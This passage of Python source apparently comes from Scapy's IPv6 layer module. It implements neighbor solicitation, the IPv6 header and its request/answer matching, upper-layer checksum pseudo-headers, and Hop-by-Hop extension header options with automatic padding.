1# SPDX-License-Identifier: GPL-2.0-only
2# This file is part of Scapy
3# See https://scapy.net/ for more information
4# Copyright (C) Guillaume Valadon <guedou@hongo.wide.ad.jp>
5# Copyright (C) Arnaud Ebalard <arnaud.ebalard@eads.net>
6
7# Cool history about this file: http://natisbad.org/scapy/index.html
8
9
10"""
11IPv6 (Internet Protocol v6).
12"""
13
14
15from hashlib import md5
16import random
17import socket
18import struct
19from time import gmtime, strftime
20
21from scapy.arch import get_if_hwaddr
22from scapy.as_resolvers import AS_resolver_riswhois
23from scapy.base_classes import Gen
24from scapy.compat import chb, orb, raw, plain_str, bytes_encode
25from scapy.consts import WINDOWS
26from scapy.config import conf
27from scapy.data import (
28 DLT_IPV6,
29 DLT_RAW,
30 DLT_RAW_ALT,
31 ETHER_ANY,
32 ETH_P_ALL,
33 ETH_P_IPV6,
34 MTU,
35)
36from scapy.error import log_runtime, warning
37from scapy.fields import (
38 BitEnumField,
39 BitField,
40 ByteEnumField,
41 ByteField,
42 DestIP6Field,
43 FieldLenField,
44 FlagsField,
45 IntField,
46 IP6Field,
47 LongField,
48 MACField,
49 MayEnd,
50 PacketLenField,
51 PacketListField,
52 ShortEnumField,
53 ShortField,
54 SourceIP6Field,
55 StrField,
56 StrFixedLenField,
57 StrLenField,
58 X3BytesField,
59 XBitField,
60 XByteField,
61 XIntField,
62 XShortField,
63)
64from scapy.layers.inet import (
65 _ICMPExtensionField,
66 _ICMPExtensionPadField,
67 _ICMP_extpad_post_dissection,
68 IP,
69 IPTools,
70 TCP,
71 TCPerror,
72 TracerouteResult,
73 UDP,
74 UDPerror,
75)
76from scapy.layers.l2 import CookedLinux, Ether, GRE, Loopback, SNAP
77from scapy.packet import bind_layers, Packet, Raw
78from scapy.sendrecv import sendp, sniff, sr, srp1
79from scapy.supersocket import SuperSocket
80from scapy.utils import checksum, strxor
81from scapy.pton_ntop import inet_pton, inet_ntop
82from scapy.utils6 import in6_getnsma, in6_getnsmac, in6_isaddr6to4, \
83 in6_isaddrllallnodes, in6_isaddrllallservers, in6_isaddrTeredo, \
84 in6_isllsnmaddr, in6_ismaddr, Net6, teredoAddrExtractInfo
85from scapy.volatile import RandInt, RandShort
86
# This module cannot work without IPv6 support in the socket module:
# fail at import time rather than later.
if not socket.has_ipv6:
    raise socket.error("can't use AF_INET6, IPv6 is disabled")
# Define the protocol constants below when the socket module lacks them.
if not hasattr(socket, "IPPROTO_IPV6"):
    # Workaround for http://bugs.python.org/issue6926
    socket.IPPROTO_IPV6 = 41
if not hasattr(socket, "IPPROTO_IPIP"):
    # Workaround for https://bitbucket.org/secdev/scapy/issue/5119
    socket.IPPROTO_IPIP = 4

if conf.route6 is None:
    # unused import, only to initialize conf.route6
    import scapy.route6  # noqa: F401

##########################
#  Neighbor cache stuff  #
##########################

# Create the "in6_neighbor" cache that getmacbyip6() reads and fills.
# NOTE(review): 120 is presumably the entry timeout in seconds -- confirm
# against conf.netcache.new_cache().
conf.netcache.new_cache("in6_neighbor", 120)
105
106
@conf.commands.register
def neighsol(addr, src, iface, timeout=1, chainCC=0):
    """Send an ICMPv6 Neighbor Solicitation and return the answer

    The solicitation asks for the link-layer address of the neighbor
    owning the IPv6 address 'addr'. It is sent on 'iface' to the
    solicited-node multicast address derived from 'addr', with 'src' as
    IPv6 source and the hardware address of 'iface' as Ethernet source.

    :param addr: IPv6 address to resolve
    :param src: IPv6 source address of the solicitation
    :param iface: interface used to send the solicitation
    :param timeout: time to wait for an answer (1 by default)
    :param chainCC: passed as-is to srp1()
    :return: whatever srp1() returns, i.e. the answering Ethernet frame
        or None when no answer was received
    """
    solicited_node = in6_getnsma(inet_pton(socket.AF_INET6, addr))
    ip_dst = inet_ntop(socket.AF_INET6, solicited_node)
    mac_dst = in6_getnsmac(solicited_node)
    mac_src = get_if_hwaddr(iface)

    request = (
        Ether(dst=mac_dst, src=mac_src) /
        IPv6(dst=ip_dst, src=src, hlim=255) /
        ICMPv6ND_NS(tgt=addr) /
        ICMPv6NDOptSrcLLAddr(lladdr=mac_src)
    )
    return srp1(request, type=ETH_P_IPV6, iface=iface, timeout=timeout,
                verbose=0, chainCC=chainCC)
134
135
@conf.commands.register
def getmacbyip6(ip6, chainCC=0):
    """Return the MAC address to use to reach an IPv6 address

    Resolution steps, in order:
      - a multicast address is mapped directly with in6_getnsmac();
      - a destination routed through the loopback interface yields
        "ff:ff:ff:ff:ff:ff";
      - otherwise the next hop (when the route has one) or the address
        itself is looked up in the "in6_neighbor" cache and, on a miss,
        resolved with neighsol(); a successful answer is cached.

    :param ip6: IPv6 address (string or Net6 instance)
    :param chainCC: passed to neighsol() when a resolution is needed
    :return: the MAC address, or None when nobody answered
    """
    if isinstance(ip6, Net6):
        ip6 = str(ip6)

    # Multicast: the MAC address is derived from the IPv6 address
    if in6_ismaddr(ip6):
        return in6_getnsmac(inet_pton(socket.AF_INET6, ip6))

    iff, a, nh = conf.route6.route(ip6)
    if iff == conf.loopback_name:
        return "ff:ff:ff:ff:ff:ff"

    # Resolve the next hop when the route provides one
    target = ip6 if nh == '::' else nh

    known = conf.netcache.in6_neighbor.get(target)
    if known:
        return known

    answer = neighsol(target, a, iff, chainCC=chainCC)
    if answer is None:
        return None

    if ICMPv6NDOptDstLLAddr in answer:
        resolved = answer[ICMPv6NDOptDstLLAddr].lladdr
    else:
        resolved = answer.src
    conf.netcache.in6_neighbor[target] = resolved
    return resolved
177
178
179#############################################################################
180#############################################################################
181# IPv6 Class #
182#############################################################################
183#############################################################################
184
# Next Header value -> display name (enum of the "nh" fields below)
ipv6nh = {
    0: "Hop-by-Hop Option Header",
    4: "IP",
    6: "TCP",
    17: "UDP",
    41: "IPv6",
    43: "Routing Header",
    44: "Fragment Header",
    47: "GRE",
    50: "ESP Header",
    51: "AH Header",
    58: "ICMPv6",
    59: "No Next Header",
    60: "Destination Option Header",
    112: "VRRP",
    132: "SCTP",
    135: "Mobility Header",
}
201
# Next Header value -> name of the payload class, used as the last resort
# lookup of _IPv6GuessPayload.default_payload_class()
ipv6nhcls = {
    0: "IPv6ExtHdrHopByHop",
    4: "IP",
    6: "TCP",
    17: "UDP",
    43: "IPv6ExtHdrRouting",
    44: "IPv6ExtHdrFragment",
    50: "ESP",
    51: "AH",
    58: "ICMPv6Unknown",
    59: "Raw",
    60: "IPv6ExtHdrDestOpt",
}
213
214
class IP6ListField(StrField):
    """Field holding a list of IPv6 addresses, 16 bytes each on the wire

    When dissecting, the list is delimited either by 'length_from' (number
    of bytes, takes precedence) or by 'count_from' (number of addresses).
    Without any of them, every remaining byte is consumed.
    """
    __slots__ = ["count_from", "length_from"]
    islist = 1

    def __init__(self, name, default, count_from=None, length_from=None):
        StrField.__init__(self, name, [] if default is None else default)
        self.count_from = count_from
        self.length_from = length_from

    def i2len(self, pkt, i):
        # Each address takes 16 bytes
        return 16 * len(i)

    def i2count(self, pkt, i):
        return len(i) if isinstance(i, list) else 0

    def getfield(self, pkt, s):
        """Return (remaining bytes, list of addresses in text form)"""
        budget = None  # number of addresses still allowed, None: no limit
        tail = b""     # bytes located after the field
        buf = s
        if self.length_from is not None:
            limit = self.length_from(pkt)
            if limit is not None:
                buf, tail = s[:limit], s[limit:]
        elif self.count_from is not None:
            budget = self.count_from(pkt)

        addrs = []
        while buf and (budget is None or budget > 0):
            if budget is not None:
                budget -= 1
            addrs.append(inet_ntop(socket.AF_INET6, buf[:16]))
            buf = buf[16:]
        return buf + tail, addrs

    def i2m(self, pkt, x):
        """Concatenate the binary form of every address of 'x'"""
        def to_bin(item):
            try:
                return inet_pton(socket.AF_INET6, item)
            except Exception:
                # Not a literal address: try to resolve it as a name
                literal = socket.getaddrinfo(item, None, socket.AF_INET6)[0][-1][0]  # noqa: E501
                return inet_pton(socket.AF_INET6, literal)

        return b"".join(to_bin(item) for item in x)

    def i2repr(self, pkt, x):
        if x is None:
            return "[]"
        return "[ %s ]" % (", ".join(['%s' % item for item in x]))
274
275
class _IPv6GuessPayload:
    name = "Dummy class that implements guess_payload_class() for IPv6"

    def default_payload_class(self, p):
        """Return the class used to dissect the payload bytes 'p'

        The choice is driven by the 'nh' field of the instance and, for
        ICMPv6, Mobile IPv6 and Routing headers, by the first bytes of
        'p'. Payloads too short to be inspected never raise: they fall
        back to Raw (ICMPv6) or to the generic ipv6nhcls lookup.
        """
        if self.nh == 58:  # ICMPv6
            if not p:
                # No type byte to look at
                return Raw
            t = orb(p[0])
            if len(p) > 2 and (t == 139 or t == 140):  # Node Info Query
                return _niquery_guesser(p)
            # Other ICMPv6 messages: unknown types have an infinite
            # minimal length and therefore end up as Raw
            if len(p) >= icmp6typesminhdrlen.get(t, float("inf")):
                if t == 130 and len(p) >= 28:
                    # RFC 3810 - 8.1. Query Version Distinctions
                    return ICMPv6MLQuery2
                return icmp6typescls.get(t, Raw)
            return Raw
        elif self.nh == 135 and len(p) > 3:  # Mobile IPv6
            return _mip6_mhtype2cls.get(orb(p[2]), MIP6MH_Generic)
        elif self.nh == 43 and len(p) > 2 and orb(p[2]) == 4:
            # Segment Routing header (routing type 4). The length guard
            # avoids an IndexError on truncated routing headers.
            return IPv6ExtHdrSegmentRouting
        return ipv6nhcls.get(self.nh, Raw)
295
296
class IPv6(_IPv6GuessPayload, Packet, IPTools):
    """IPv6 header

    'plen' is computed at build time when left to None. Dissection of
    jumbograms (plen == 0 with a Hop-by-Hop Jumbo option) is handled in
    extract_padding().
    """
    name = "IPv6"
    fields_desc = [BitField("version", 6, 4),
                   BitField("tc", 0, 8),
                   BitField("fl", 0, 20),
                   ShortField("plen", None),
                   ByteEnumField("nh", 59, ipv6nh),
                   ByteField("hlim", 64),
                   SourceIP6Field("src", "dst"),  # dst is for src @ selection
                   DestIP6Field("dst", "::1")]

    def route(self):
        """Used to select the L2 address"""
        dst = self.dst
        if isinstance(dst, Gen):
            # Several destinations: route according to the first one
            dst = next(iter(dst))
        return conf.route6.route(dst)

    def mysummary(self):
        return "%s > %s (%i)" % (self.src, self.dst, self.nh)

    def post_build(self, p, pay):
        """Append the payload and fill 'plen' when it was left to None"""
        p += pay
        if self.plen is None:
            # The payload length excludes the 40 bytes of the IPv6 header
            tmp_len = len(p) - 40
            p = p[:4] + struct.pack("!H", tmp_len) + p[6:]
        return p

    def extract_padding(self, data):
        """Extract the IPv6 payload

        :param data: bytes following the IPv6 header
        :return: a (payload, padding) tuple
        """

        if self.plen == 0 and self.nh == 0 and len(data) >= 8:
            # Extract Hop-by-Hop extension length
            hbh_len = 8 + orb(data[1]) * 8

            # Extract length from the Jumbogram option
            # Note: the following algorithm takes advantage of the Jumbo
            #       option mandatory alignment (4n + 2, RFC2675 Section 2).
            #       Only offsets located inside the Hop-by-Hop header, and
            #       leaving room for a whole option (6 bytes), are probed.
            jumbo_len = None
            scan_end = min(hbh_len, len(data))
            for offset in range(2, scan_end - 5, 4):
                if orb(data[offset]) == 0xc2:  # Jumbo option
                    # Skip the type and length bytes; the value is a
                    # 32-bit integer in network byte order
                    jumbo_len = struct.unpack(
                        "!I", data[offset + 2:offset + 6]
                    )[0]
                    break

            if jumbo_len is None:
                log_runtime.info("Scapy did not find a Jumbo option")
                jumbo_len = 0

            # NOTE(review): RFC 2675 seems to define the Jumbo length as
            # already including the Hop-by-Hop header; the historical sum
            # is kept as-is -- confirm before changing it.
            tmp_len = hbh_len + jumbo_len
        else:
            tmp_len = self.plen

        return data[:tmp_len], data[tmp_len:]

    def hashret(self):
        """Return the value used to pair requests and answers"""
        if self.nh == 58 and isinstance(self.payload, _ICMPv6):
            if self.payload.type < 128:
                # ICMPv6 error: rely on the cited packet
                return self.payload.payload.hashret()
            elif (self.payload.type in [133, 134, 135, 136, 144, 145]):
                return struct.pack("B", self.nh) + self.payload.hashret()

        if not conf.checkIPinIP and self.nh in [4, 41]:  # IP, IPv6
            return self.payload.hashret()

        nh = self.nh
        sd = self.dst
        ss = self.src
        if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting):
            # With routing header, the destination is the last
            # address of the IPv6 list if segleft > 0
            nh = self.payload.nh
            try:
                sd = self.addresses[-1]
            except IndexError:
                sd = '::1'
            # TODO: big bug with ICMPv6 error messages as the destination of IPerror6  # noqa: E501
            #       could be anything from the original list ...
            sd = inet_pton(socket.AF_INET6, sd)
            for a in self.addresses:
                a = inet_pton(socket.AF_INET6, a)
                sd = strxor(sd, a)
            sd = inet_ntop(socket.AF_INET6, sd)

        if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrSegmentRouting):  # noqa: E501
            # With segment routing header (rh == 4), the destination is
            # the first address of the IPv6 addresses list
            try:
                sd = self.addresses[0]
            except IndexError:
                sd = self.dst

        if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment):
            nh = self.payload.nh

        if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop):
            nh = self.payload.nh

        if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt):
            # The Home Address option, when present, gives the source
            foundhao = None
            for o in self.payload.options:
                if isinstance(o, HAO):
                    foundhao = o
            if foundhao:
                ss = foundhao.hoa
            nh = self.payload.nh  # XXX what if another extension follows ?

        if conf.checkIPsrc and conf.checkIPaddr and not in6_ismaddr(sd):
            sd = inet_pton(socket.AF_INET6, sd)
            ss = inet_pton(socket.AF_INET6, ss)
            return strxor(sd, ss) + struct.pack("B", nh) + self.payload.hashret()  # noqa: E501
        else:
            return struct.pack("B", nh) + self.payload.hashret()

    def answers(self, other):
        """Tell whether self (the reply) answers 'other' (the request)"""
        if not conf.checkIPinIP:  # skip IP in IP and IPv6 in IP
            if self.nh in [4, 41]:
                return self.payload.answers(other)
            if isinstance(other, IPv6) and other.nh in [4, 41]:
                return self.answers(other.payload)
            if isinstance(other, IP) and other.proto in [4, 41]:
                return self.answers(other.payload)
        if not isinstance(other, IPv6):  # self is reply, other is request
            return False
        if conf.checkIPaddr:
            # ss = inet_pton(socket.AF_INET6, self.src)
            sd = inet_pton(socket.AF_INET6, self.dst)
            os = inet_pton(socket.AF_INET6, other.src)
            od = inet_pton(socket.AF_INET6, other.dst)
            # request was sent to a multicast address (other.dst)
            # Check reply destination addr matches request source addr (i.e
            # sd == os) except when reply is multicasted too
            # XXX test mcast scope matching ?
            if in6_ismaddr(other.dst):
                if in6_ismaddr(self.dst):
                    if ((od == sd) or
                            (in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))):  # noqa: E501
                        return self.payload.answers(other.payload)
                    return False
                if (os == sd):
                    return self.payload.answers(other.payload)
                return False
            elif (sd != os):  # or ss != od): <- removed for ICMP errors
                return False
        if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128:  # noqa: E501
            # ICMPv6 Error message -> generated by IPv6 packet
            # Note : at the moment, we jump the ICMPv6 specific class
            # to call answers() method of erroneous packet (over
            # initial packet). There can be cases where an ICMPv6 error
            # class could implement a specific answers method that perform
            # a specific task. Currently, don't see any use ...
            return self.payload.payload.answers(other)
        elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop):
            return self.payload.answers(other.payload)
        elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment):
            return self.payload.answers(other.payload.payload)
        elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting):
            return self.payload.answers(other.payload.payload)  # Buggy if self.payload is a IPv6ExtHdrRouting  # noqa: E501
        elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrSegmentRouting):  # noqa: E501
            return self.payload.answers(other.payload.payload)  # Buggy if self.payload is a IPv6ExtHdrRouting  # noqa: E501
        elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt):
            return self.payload.answers(other.payload.payload)
        elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt):  # BU in reply to BRR, for instance  # noqa: E501
            return self.payload.payload.answers(other.payload)
        else:
            if (self.nh != other.nh):
                return False
            return self.payload.answers(other.payload)
471
472
class IPv46(IP):
    """
    This class implements a dispatcher that is used to detect the IP version
    while parsing Raw IP pcap files.
    """
    @classmethod
    def dispatch_hook(cls, _pkt=None, *_, **kargs):
        # When dissecting, the version is the high nibble of the first
        # byte. When building, it comes from the 'version' keyword.
        if _pkt:
            is_v6 = orb(_pkt[0]) >> 4 == 6
        else:
            is_v6 = kargs.get("version") == 6
        return IPv6 if is_v6 else IP
486
487
def inet6_register_l3(l2, l3):
    """
    Resolves the default L2 destination address when IPv6 is used.

    :param l2: the link layer (unused)
    :param l3: the IPv6 layer, whose 'dst' is resolved with getmacbyip6()
    """
    destination = l3.dst
    return getmacbyip6(destination)


# Use the resolver above whenever an IPv6 layer sits on top of Ether
conf.neighbor.register_l3(Ether, IPv6, inet6_register_l3)
496
497
class IPerror6(IPv6):
    """IPv6 header cited inside an ICMPv6 error message"""
    name = "IPv6 in ICMPv6"

    def answers(self, other):
        """Tell whether this citation matches the sent packet 'other'

        Addresses must match (the destination is not checked when the
        request carries a Routing Header), then the upper layers are
        compared on their common length. TCP options, checksum and data
        offset are ignored when options differ (MSS clamping).
        """
        if not isinstance(other, IPv6):
            return False
        sd = inet_pton(socket.AF_INET6, self.dst)
        ss = inet_pton(socket.AF_INET6, self.src)
        od = inet_pton(socket.AF_INET6, other.dst)
        os = inet_pton(socket.AF_INET6, other.src)

        # Make sure that the ICMPv6 error is related to the packet scapy sent
        if isinstance(self.underlayer, _ICMPv6) and self.underlayer.type < 128:

            # find upper layer for self (possible citation)
            selfup = self.payload
            while selfup is not None and isinstance(selfup, _IPv6ExtHdr):
                selfup = selfup.payload

            # find upper layer for other (initial packet). Also look for RH
            otherup = other.payload
            request_has_rh = False
            while otherup is not None and isinstance(otherup, _IPv6ExtHdr):
                if isinstance(otherup, IPv6ExtHdrRouting):
                    request_has_rh = True
                otherup = otherup.payload

            def same_upper_layer():
                # The citation may be truncated: compare the common prefix
                s1 = raw(selfup)
                s2 = raw(otherup)
                tmp_len = min(len(s1), len(s2))
                return s1[:tmp_len] == s2[:tmp_len]

            # Basic case, or request has a RH : don't check dst address
            if ss == os and (sd == od or request_has_rh):

                # Let's deal with possible MSS Clamping
                if (isinstance(selfup, TCP) and
                        isinstance(otherup, TCP) and
                        selfup.options != otherup.options):  # seems clamped

                    # Save fields modified by MSS clamping
                    saved = [(layer, fname, getattr(layer, fname))
                             for layer in (otherup, selfup)
                             for fname in ("options", "chksum", "dataofs")]
                    try:
                        # Nullify them, then test
                        for layer in (otherup, selfup):
                            layer.options = []
                            layer.chksum = 0
                            layer.dataofs = 0
                        return same_upper_layer()
                    finally:
                        # Always recall saved values, even when building
                        # one of the packets failed
                        for layer, fname, value in saved:
                            setattr(layer, fname, value)

                return same_upper_layer()

        return False

    def mysummary(self):
        return Packet.mysummary(self)
575
576
577#############################################################################
578#############################################################################
579# Upper Layer Checksum computation #
580#############################################################################
581#############################################################################
582
class PseudoIPv6(Packet):
    """IPv6 pseudo-header, filled by in6_pseudoheader() for checksums"""
    name = "Pseudo IPv6 Header"
    fields_desc = [
        IP6Field("src", "::"),
        IP6Field("dst", "::"),
        IntField("uplen", None),
        BitField("zero", 0, 24),
        ByteField("nh", 0),
    ]
590
591
def in6_pseudoheader(nh, u, plen):
    # type: (int, IP, int) -> PseudoIPv6
    """
    Build a PseudoIPv6 instance as specified in RFC 2460 8.1

    The underlayers of 'u' are walked down to the IPv6 header and the
    pseudo header is filled with:
    - the Next Header value 'nh'
    - the _final_ destination: the last address of a Routing Header (the
      first one for a Segment Routing Header) whose segleft is not null
      and whose address list is not empty; the closest such header to 'u'
      wins. Otherwise, the destination of the IPv6 header.
    - the _real_ source: the home address of a Destination Option header
      holding a single HAO option, otherwise the source of the IPv6 header
    - 'plen' as upper layer length

    :param nh: value of upper layer protocol
    :param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be
        provided with all under layers (IPv6 and all extension headers,
        for example)
    :param plen: the length of the upper layer and payload
    :return: the PseudoIPv6 instance, or None (with a warning) when no
        IPv6 underlayer is found
    """
    pseudo = PseudoIPv6()
    pseudo.nh = nh
    final_dst = 0
    home_addr = 0
    dst_found = False
    while u is not None and not isinstance(u, IPv6):
        if (isinstance(u, IPv6ExtHdrRouting) and
                u.segleft != 0 and len(u.addresses) != 0 and
                not dst_found):
            final_dst = u.addresses[-1]
            dst_found = True
        elif (isinstance(u, IPv6ExtHdrSegmentRouting) and
                u.segleft != 0 and len(u.addresses) != 0 and
                not dst_found):
            final_dst = u.addresses[0]
            dst_found = True
        elif (isinstance(u, IPv6ExtHdrDestOpt) and (len(u.options) == 1) and
                isinstance(u.options[0], HAO)):
            home_addr = u.options[0].hoa
        u = u.underlayer

    if u is None:
        warning("No IPv6 underlayer to compute checksum. Leaving null.")
        return None

    # 'u' is now the IPv6 header
    pseudo.src = home_addr if home_addr else u.src
    pseudo.dst = final_dst if final_dst else u.dst
    pseudo.uplen = plen
    return pseudo
647
648
def in6_chksum(nh, u, p):
    """
    As Specified in RFC 2460 - 8.1 Upper-Layer Checksums

    The checksum covers the pseudo header built by `.in6_pseudoheader`
    followed by 'p'.

    :param nh: value of upper layer protocol
    :param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be
        provided with all under layers (IPv6 and all extension headers,
        for example)
    :param p: the payload of the upper layer provided as a string
    :return: the checksum, or 0 when no pseudo header could be built
    """
    pseudo = in6_pseudoheader(nh, u, len(p))
    return 0 if pseudo is None else checksum(raw(pseudo) + p)
666
667
668#############################################################################
669#############################################################################
670# Extension Headers #
671#############################################################################
672#############################################################################
673
674
675# Inherited by all extension header classes
class _IPv6ExtHdr(_IPv6GuessPayload, Packet):
    """Common base class of the IPv6 extension headers"""
    name = 'Abstract IPv6 Option Header'
    aliastypes = [
        IPv6,
        IPerror6,
    ]  # TODO ...
679
680
681# IPv6 options for Extension Headers #
682
683_hbhopts = {0x00: "Pad1",
684 0x01: "PadN",
685 0x04: "Tunnel Encapsulation Limit",
686 0x05: "Router Alert",
687 0x06: "Quick-Start",
688 0xc2: "Jumbo Payload",
689 0xc9: "Home Address Option"}
690
691
class _OTypeField(ByteEnumField):
    """
    Modified ByteEnumField whose representation also decodes the three
    high-order bits of the IPv6 option type: what nodes that do not
    understand the option must do with it, and whether the option may
    change en-route.

    It is used by Jumbo, Pad1, PadN, RouterAlert, HAO options
    """
    # Two highest-order bits of the option type
    pol = {
        0x00: "00: skip",
        0x40: "01: discard",
        0x80: "10: discard+ICMP",
        0xC0: "11: discard+ICMP not mcast",
    }

    # Third highest-order bit of the option type
    enroutechange = {
        0x00: "0: Don't change en-route",
        0x20: "1: May change en-route",
    }

    def i2repr(self, pkt, x):
        label = self.i2s.get(x, repr(x))
        return "%s [%s, %s]" % (label,
                                self.pol[x & 0xC0],
                                self.enroutechange[x & 0x20])
713
714
class HBHOptUnknown(Packet):  # IPv6 Hop-By-Hop Option
    """Generic type/length/data option, also used as options dispatcher"""
    name = "Scapy6 Unknown Option"
    fields_desc = [
        _OTypeField("otype", 0x01, _hbhopts),
        FieldLenField("optlen", None, length_of="optdata", fmt="B"),
        StrLenField("optdata", "", length_from=lambda pkt: pkt.optlen),
    ]

    def alignment_delta(self, curpos):  # By default, no alignment requirement
        """
        As specified in section 4.2 of RFC 2460, every options has
        an alignment requirement usually expressed xn+y, meaning
        the Option Type must appear at an integer multiple of x octets
        from the start of the header, plus y octets.

        That function is provided the current position from the
        start of the header and returns required padding length.
        """
        return 0

    @classmethod
    def dispatch_hook(cls, _pkt=None, *args, **kargs):
        # Without bytes to look at, or for an option type that has no
        # dedicated class, stay on the current class
        if not _pkt:
            return cls
        return _hbhoptcls.get(orb(_pkt[0]), cls)

    def extract_padding(self, p):
        # What follows belongs to the next option, not to this one
        return b"", p
744
745
class Pad1(Packet):  # IPv6 Hop-By-Hop Option
    """One byte padding option: made of its type only"""
    name = "Pad1"
    fields_desc = [
        _OTypeField("otype", 0x00, _hbhopts),
    ]

    def alignment_delta(self, curpos):
        # No alignment requirement
        return 0

    def extract_padding(self, p):
        # What follows belongs to the next option
        return b"", p
755
756
class PadN(Packet):  # IPv6 Hop-By-Hop Option
    """Padding option with a length byte and 'optlen' bytes of data"""
    name = "PadN"
    fields_desc = [
        _OTypeField("otype", 0x01, _hbhopts),
        FieldLenField("optlen", None, length_of="optdata", fmt="B"),
        StrLenField("optdata", "", length_from=lambda pkt: pkt.optlen),
    ]

    def alignment_delta(self, curpos):
        # No alignment requirement
        return 0

    def extract_padding(self, p):
        # What follows belongs to the next option
        return b"", p
769
770
class RouterAlert(Packet):  # RFC 2711 - IPv6 Hop-By-Hop Option
    """Router Alert option"""
    name = "Router Alert"
    fields_desc = [
        _OTypeField("otype", 0x05, _hbhopts),
        ByteField("optlen", 2),
        ShortEnumField("value", None, {
            0: "Datagram contains a MLD message",
            1: "Datagram contains RSVP message",
            2: "Datagram contains an Active Network message",
            68: "NSIS NATFW NSLP",
            69: "MPLS OAM",
            65535: "Reserved",
        }),
    ]
    # TODO : Check IANA has not defined new values for value field of RouterAlertOption  # noqa: E501
    # TODO : Now that we have that option, we should do something in MLD class that need it  # noqa: E501
    # TODO : IANA has defined ranges of values which can't be easily represented here.  # noqa: E501
    #        iana.org/assignments/ipv6-routeralert-values/ipv6-routeralert-values.xhtml

    def alignment_delta(self, curpos):
        """Padding needed at 'curpos' to reach a 2n+0 alignment"""
        modulus, remainder = 2, 0
        return (remainder - curpos) % modulus

    def extract_padding(self, p):
        # What follows belongs to the next option
        return b"", p
795
796
class RplOption(Packet):  # RFC 6553 - RPL Option
    """RPL option: three flag bits, an instance id and the sender rank"""
    name = "RPL Option"
    fields_desc = [
        _OTypeField("otype", 0x63, _hbhopts),
        ByteField("optlen", 4),
        BitField("Down", 0, 1),
        BitField("RankError", 0, 1),
        BitField("ForwardError", 0, 1),
        BitField("unused", 0, 5),
        XByteField("RplInstanceId", 0),
        XShortField("SenderRank", 0),
    ]

    def alignment_delta(self, curpos):
        """Padding needed at 'curpos' to reach a 2n+0 alignment"""
        modulus, remainder = 2, 0
        return (remainder - curpos) % modulus

    def extract_padding(self, p):
        # What follows belongs to the next option
        return b"", p
816
817
class Jumbo(Packet):  # IPv6 Hop-By-Hop Option
    """Jumbo Payload option, carrying a 32-bit payload length"""
    name = "Jumbo Payload"
    fields_desc = [
        _OTypeField("otype", 0xC2, _hbhopts),
        ByteField("optlen", 4),
        IntField("jumboplen", None),
    ]

    def alignment_delta(self, curpos):
        """Padding needed at 'curpos' to reach a 4n+2 alignment"""
        modulus, remainder = 4, 2
        return (remainder - curpos) % modulus

    def extract_padding(self, p):
        # What follows belongs to the next option
        return b"", p
832
833
class HAO(Packet):  # IPv6 Destination Options Header Option
    """Home Address option, carrying an IPv6 address in 'hoa'"""
    name = "Home Address Option"
    fields_desc = [
        _OTypeField("otype", 0xC9, _hbhopts),
        ByteField("optlen", 16),
        IP6Field("hoa", "::"),
    ]

    def alignment_delta(self, curpos):
        """Padding needed at 'curpos' to reach a 8n+6 alignment"""
        modulus, remainder = 8, 6
        return (remainder - curpos) % modulus

    def extract_padding(self, p):
        # What follows belongs to the next option
        return b"", p
848
849
# Option type -> dedicated class, used by HBHOptUnknown.dispatch_hook()
_hbhoptcls = {
    0x00: Pad1,
    0x01: PadN,
    0x05: RouterAlert,
    0x63: RplOption,
    0xC2: Jumbo,
    0xC9: HAO,
}
856
857
858# Hop-by-Hop Extension Header #
859
class _OptionsField(PacketListField):
    """List of options that inserts padding options when building

    'curpos' is the offset of the field from the start of the header: it
    is the position used for the alignment of the first option.
    """
    __slots__ = ["curpos"]

    def __init__(self, name, default, cls, curpos, *args, **kargs):
        self.curpos = curpos
        PacketListField.__init__(self, name, default, cls, *args, **kargs)

    def i2len(self, pkt, i):
        # The length includes the padding added by i2m()
        return len(self.i2m(pkt, i))

    def i2m(self, pkt, x):
        """Build the options, padded unless 'autopad' is disabled

        Each option is preceded by the padding required by its
        alignment_delta(), and the result is completed so that the
        position reached is a multiple of 8.
        """
        try:
            autopad = getattr(pkt, "autopad")  # Hack : 'autopad' phantom field
        except Exception:
            autopad = 1

        if not autopad:
            return b"".join(map(bytes, x))

        def filler(gap):
            # One missing byte: Pad1. Otherwise PadN, whose type and
            # length bytes already account for two bytes.
            if gap == 1:
                return raw(Pad1())
            if gap != 0:
                return raw(PadN(optdata=b'\x00' * (gap - 2)))
            return b""

        pos = self.curpos
        chunks = []
        for opt in x:
            gap = opt.alignment_delta(pos)
            chunks.append(filler(gap))
            encoded = raw(opt)
            chunks.append(encoded)
            pos += gap + len(encoded)

        # Let's make the class including our option field
        # a multiple of 8 octets long
        chunks.append(filler(-pos % 8))
        return b"".join(chunks)

    def addfield(self, pkt, s, val):
        return s + self.i2m(pkt, val)
908
909
class _PhantomAutoPadField(ByteField):
    """Field that takes no room on the wire

    Nothing is added when building; nothing is consumed when dissecting,
    where the value is always 1.
    """

    def addfield(self, pkt, s, val):
        return s

    def getfield(self, pkt, s):
        return s, 1

    def i2repr(self, pkt, x):
        return "On" if x else "Off"
921
922
class IPv6ExtHdrHopByHop(_IPv6ExtHdr):
    """Hop-by-Hop Options extension header

    'len' is the size of the header in 8-byte units, first unit excluded.
    At build time it is derived from the length of 'options' plus the two
    bytes of 'nh' and 'len'.
    """
    name = "IPv6 Extension Header - Hop-by-Hop Options Header"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        FieldLenField("len", None, length_of="options", fmt="B",
                      adjust=lambda pkt, x: (x + 9) // 8 - 1),
        # autopad activated by default
        _PhantomAutoPadField("autopad", 1),
        _OptionsField("options", [], HBHOptUnknown, 2,
                      length_from=lambda pkt: 8 * (pkt.len + 1) - 2),
    ]
    overload_fields = {IPv6: {"nh": 0}}
932
933
934# Destination Option Header #
935
